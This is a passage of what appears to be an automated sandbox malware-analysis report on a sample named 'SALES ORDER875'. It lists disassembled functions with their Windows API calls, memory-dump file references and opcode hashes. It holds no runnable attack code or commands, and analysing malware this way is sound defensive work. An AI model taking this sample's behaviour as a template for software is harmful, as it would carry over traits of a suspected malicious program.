                                                                                                                                                                                    • VariantCopy.OLEAUT32(003DFA64,00000000), ref: 003DF8B1
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003DF8BB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                    • Opcode ID: a3eec7fb8c810e283edfb902c997c06d4d78daf6f56fbf0d1baeb5ceb404b518
                                                                                                                                                                                    • Instruction ID: 679d9e9c29fa30613cbe859bbd78e99a0e32c13eb90fba5659fa5b9a8dc420a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3eec7fb8c810e283edfb902c997c06d4d78daf6f56fbf0d1baeb5ceb404b518
                                                                                                                                                                                    • Instruction Fuzzy Hash: A651A336940310AEDF12AB65E8E5B29B3A8EF45710B249467E907DF395DB708C40CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00387620: _wcslen.LIBCMT ref: 00387625
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 003F94E5
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F9506
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F952D
                                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 003F9585
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                                                                    • Opcode ID: c95f2a3ccf8736fe45f69016dcfbe22efcb1274835ede9e23a043ba1307a3861
                                                                                                                                                                                    • Instruction ID: 6fa5d9134de70758670861b457a293f16a3773ade86cbfce58671b2f01b1fda9
                                                                                                                                                                                    • Opcode Fuzzy Hash: c95f2a3ccf8736fe45f69016dcfbe22efcb1274835ede9e23a043ba1307a3861
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E1B4316043059FC716EF24C881B6AB7E4BF85314F1589AEF9899B2A2DB31DD05CB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00399BB2
                                                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00399241
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003992A5
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 003992C2
                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003992D3
                                                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00399321
                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003D71EA
                                                                                                                                                                                      • Part of subcall function 00399339: BeginPath.GDI32(00000000), ref: 00399357
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3050599898-0
                                                                                                                                                                                    • Opcode ID: 913468e46d3f1c1b91dfa437a3702a3c06c1df482e76a65fefdee8feee92abfc
                                                                                                                                                                                    • Instruction ID: 28a1c083ac5de26b48bba8de46aefd9474995ffa3eaf035a70ea961b51c40f48
                                                                                                                                                                                    • Opcode Fuzzy Hash: 913468e46d3f1c1b91dfa437a3702a3c06c1df482e76a65fefdee8feee92abfc
                                                                                                                                                                                    • Instruction Fuzzy Hash: A041B271104300AFDB12DF28DCC5FAA7BA8EB4A321F04062EF995872B2D7309845DB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003F080C
                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003F0847
                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 003F0863
                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 003F08DC
                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003F08F3
                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F0921
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                    • Opcode ID: 2f81dc2c8a9a766f5939c438cb9223e1990ed823f6c2cb33f5d2af727b03b810
                                                                                                                                                                                    • Instruction ID: 4777157fe4adc7eb761326fa399ab23134c515b88ff52464774e1b353d9ccd01
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f81dc2c8a9a766f5939c438cb9223e1990ed823f6c2cb33f5d2af727b03b810
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75415A71A00209EFDF1AAF54DC85AAAB7B8FF04310B1480A5ED00DE297DB30DE54DBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,003DF3AB,00000000,?,?,00000000,?,003D682C,00000004,00000000,00000000), ref: 0041824C
                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00418272
                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004182D1
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 004182E5
                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0041830B
                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0041832F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                                                    • Opcode ID: 83600d81ac71637d165b11b488205d43d0cb553f4ba8234a9c7c4568c1d9d273
                                                                                                                                                                                    • Instruction ID: 4494b7e7c4ed0f17e0e49aa04e22fab7841bfa3d6cb0475dd85f3f63c6a556cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83600d81ac71637d165b11b488205d43d0cb553f4ba8234a9c7c4568c1d9d273
                                                                                                                                                                                    • Instruction Fuzzy Hash: D541B674601644AFDB12CF15CC95BE97BE0BB06715F1841BEE9184B3B2CB76AC81CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 003E4C95
                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003E4CB2
                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003E4CEA
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003E4D08
                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003E4D10
                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 003E4D1A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                    • Opcode ID: 218810b748c8aefe1ab28c9c3ca978e86c3d0fc8d6460ef60694519d6a9d189b
                                                                                                                                                                                    • Instruction ID: a28c8257c2ec4dbd10913ceabd0b8a758a4db8bf918de4d02f1a60262927dd73
                                                                                                                                                                                    • Opcode Fuzzy Hash: 218810b748c8aefe1ab28c9c3ca978e86c3d0fc8d6460ef60694519d6a9d189b
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21F632604250BFEB175B3AAC49E7BBB9CDF49750F118139F805CE1D2EA61DC4096A0
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00383AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00383A97,?,?,00382E7F,?,?,?,00000000), ref: 00383AC2
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F587B
                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003F5995
                                                                                                                                                                                    • CoCreateInstance.OLE32(0041FCF8,00000000,00000001,0041FB68,?), ref: 003F59AE
                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 003F59CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                    • Opcode ID: 93fe01976f7f2ee873daf6c426f20a2844c4cb895f2e133c510d3ec118489221
                                                                                                                                                                                    • Instruction ID: 860a3a38a5e621296f26fc0f6627eb10b50b3d79eb78008635b3b9f28bbf4bce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93fe01976f7f2ee873daf6c426f20a2844c4cb895f2e133c510d3ec118489221
                                                                                                                                                                                    • Instruction Fuzzy Hash: A0D176716087059FC715EF14C480A2ABBE5FF89710F15889DFA8A9B361D731EC45CB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E0FCA
                                                                                                                                                                                      • Part of subcall function 003E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E0FD6
                                                                                                                                                                                      • Part of subcall function 003E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E0FE5
                                                                                                                                                                                      • Part of subcall function 003E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E0FEC
                                                                                                                                                                                      • Part of subcall function 003E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E1002
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,003E1335), ref: 003E17AE
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003E17BA
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 003E17C1
                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 003E17DA
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,003E1335), ref: 003E17EE
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E17F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                                                    • Opcode ID: 96af7c1618820efb734405b64dd6b2d9d35ed973157d181d7165c3eaabecb39a
                                                                                                                                                                                    • Instruction ID: aca181d0ebaaa16cf7edb1160cd517c6ca55ff9280d5d1bd80f3b72a090ebeb1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af7c1618820efb734405b64dd6b2d9d35ed973157d181d7165c3eaabecb39a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D11BE31580215FFDB219FA5CC89BEE7BB9EB45755F118228F481A7290C736A940CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003E14FF
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 003E1506
                                                                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003E1515
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 003E1520
                                                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E154F
                                                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 003E1563
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                                                    • Opcode ID: 19c383c4e9b5c1ce2eb9bad36035eadffeae2c6123f22e2af5112e74e2c84da0
                                                                                                                                                                                    • Instruction ID: 2788cfda0a01b7a5aa6c4c27351b8d92b0a957968e23d94c8ca1653f0aaefba1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19c383c4e9b5c1ce2eb9bad36035eadffeae2c6123f22e2af5112e74e2c84da0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C11567250025EABDF128FA9DD89BDE7BB9EF48704F058124FA05A21A0C3718E60DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,003A3379,003A2FE5), ref: 003A3390
                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003A339E
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003A33B7
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,003A3379,003A2FE5), ref: 003A3409
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                    • Opcode ID: 8e6b423c689b0b556aa16be2fcc6f06aeafc13a697c4908e4ee3cc5b9a7fb401
                                                                                                                                                                                    • Instruction ID: 7c33d45cd3b9bc132ab85f6ddb292a3ffcd43e7db617c719a808231dbbc8565d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6b423c689b0b556aa16be2fcc6f06aeafc13a697c4908e4ee3cc5b9a7fb401
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01473B74E311BEAA6727B57CC55A76A94EB073793200239F420891F0EF214D015148
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,003B5686,003C3CD6,?,00000000,?,003B5B6A,?,?,?,?,?,003AE6D1,?,00448A48), ref: 003B2D78
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2DAB
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2DD3
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,003AE6D1,?,00448A48,00000010,00384F4A,?,?,00000000,003C3CD6), ref: 003B2DE0
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,003AE6D1,?,00448A48,00000010,00384F4A,?,?,00000000,003C3CD6), ref: 003B2DEC
                                                                                                                                                                                    • _abort.LIBCMT ref: 003B2DF2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: a20d56d8bafc8a7fe8aade3a6780a834ac2e4c401693ed913b1ae1a1e81d916d
                                                                                                                                                                                    • Instruction ID: 2f1602787aad6ef3bc50529445baf4f98b15c16a7887faa8c97592abcdc3c002
                                                                                                                                                                                    • Opcode Fuzzy Hash: a20d56d8bafc8a7fe8aade3a6780a834ac2e4c401693ed913b1ae1a1e81d916d
                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF0F43558561027C6133738AC0AADB2559ABC67ADB264B2CFB349AD96EF2488014164
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00399693
                                                                                                                                                                                      • Part of subcall function 00399639: SelectObject.GDI32(?,00000000), ref: 003996A2
                                                                                                                                                                                      • Part of subcall function 00399639: BeginPath.GDI32(?), ref: 003996B9
                                                                                                                                                                                      • Part of subcall function 00399639: SelectObject.GDI32(?,00000000), ref: 003996E2
                                                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00418A4E
                                                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00418A62
                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00418A70
                                                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00418A80
                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00418A90
                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00418AA0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                    • Opcode ID: 1ad38c5dd1010ce9fca7e95c3873a21b5919767e986bfc87f4ed09d8d34e5acb
                                                                                                                                                                                    • Instruction ID: 7b39e0f8203bec0721ed7fe09bc5d70379524eb0b8c7a57c0b383dac58f6ed3d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad38c5dd1010ce9fca7e95c3873a21b5919767e986bfc87f4ed09d8d34e5acb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6211F776040108FFDB129F94DC88FEA7F6CEB08390F00C026BA199A1A1C7719D55DBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 003E5218
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 003E5229
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E5230
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 003E5238
                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003E524F
                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 003E5261
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
